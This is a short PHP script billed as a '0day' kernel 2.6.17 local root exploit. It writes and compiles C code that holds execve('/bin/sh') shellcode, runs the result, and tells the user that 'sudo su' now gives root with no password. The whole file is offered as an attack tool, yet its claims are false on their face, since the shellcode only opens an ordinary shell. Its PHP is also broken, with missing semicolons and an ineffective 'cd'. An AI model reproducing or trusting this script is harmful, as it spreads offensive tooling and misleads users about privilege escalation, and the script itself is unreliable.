Priv8 Root Exploit 2.6.17

1. <?php
2. /******************************
3. ![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
4. Script Name : *nix Kernel <=2.6.17 Sudo Root Exploit
5. Author : Affix
6. Website : http://iHack.co.uk
7. Description :
8. Once this script has been run via
9. Command line type `sudo su` and
10. you will log in as root without the
11. root password
12. [PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
13. ******************************/
14.  
15. $cCode = "#include <stdio.h>
16.  
17. char shellcode[] =
18. \"\x31\xc0\" /* xor %eax, %eax */
19. \"\x50\" /* push %eax */
20. \"\x68\x2f\x2f\x73\x68\" /* push $0x68732f2f */
21. \"\x68\x2f\x62\x69\x6e\" /* push $0x6e69622f */
22. \"\x89\xe3\" /* mov %esp,%ebx */
23. \"\x50\" /* push %eax */
24. \"\x53\" /* push %ebx */
25. \"\x89\xe1\" /* mov %esp,%ecx */
26. \"\x31\xd2\" /* xor %edx,%edx */
27. \"\xb0\x0b\" /* mov $0xb,%al */
28. \"\xcd\x80\"; /* int $0x80 */
29.  
30. int main()
31. {
32. void (*fp) (void);
33. fp = (void *)shellcode;
34. fp();
35. }";
36.  
37. print "$ 0day Kernel 2.6.17 Local Root by krupt\n"
38. print "$ PoC krupt <iamkrupt@gmail.com>\n"
39. print "$ Exploit : Affix <affix@iHack.co.uk\n";
40. print "$...\n";
41. print "$ Please wait Exploit is being Executed...";
42.  
43. $fh = fopen("/tmp/sploit.c", 'w') or die("can't open file");
44. fwrite($fh, $cCode);
45. fclose($fh);
46.  
47. system("cd /tmp");
48. system("cc -o sploit sploit.c");
49. system("chmod 777 sploit.c");
50.  
51. print "$ You may now login as root with no password."
52. print "$ Execute 'sudo su' command "
53. print "$ Root Shell spawning "
54.  
55. system("./sploit");
56.  
57. //![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]![PRIV]!
58. ?>